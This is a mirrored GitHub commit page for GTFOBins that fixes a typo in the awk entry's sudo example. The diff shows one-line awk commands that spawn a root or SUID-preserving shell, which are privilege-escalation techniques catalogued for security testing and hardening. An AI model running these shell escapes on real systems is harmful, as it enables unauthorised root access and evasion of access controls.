mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 06:49:44 +01:00
Remove the -p option from sudo-enabled (typo)
This commit is contained in:
parent
d7344a5230
commit
84f48081fb
@ -3,7 +3,7 @@ functions:
|
||||
exec-interactive:
|
||||
- code: awk 'BEGIN {system("/bin/sh")}'
|
||||
sudo-enabled:
|
||||
- code: sudo awk 'BEGIN {system("/bin/sh -p")}'
|
||||
- code: sudo awk 'BEGIN {system("/bin/sh")}'
|
||||
suid-limited:
|
||||
- code: ./awk 'BEGIN {system("/bin/sh -p")}'
|
||||
reverse-shell-non-interactive:
|
||||
|
Loading…
Reference in New Issue
Block a user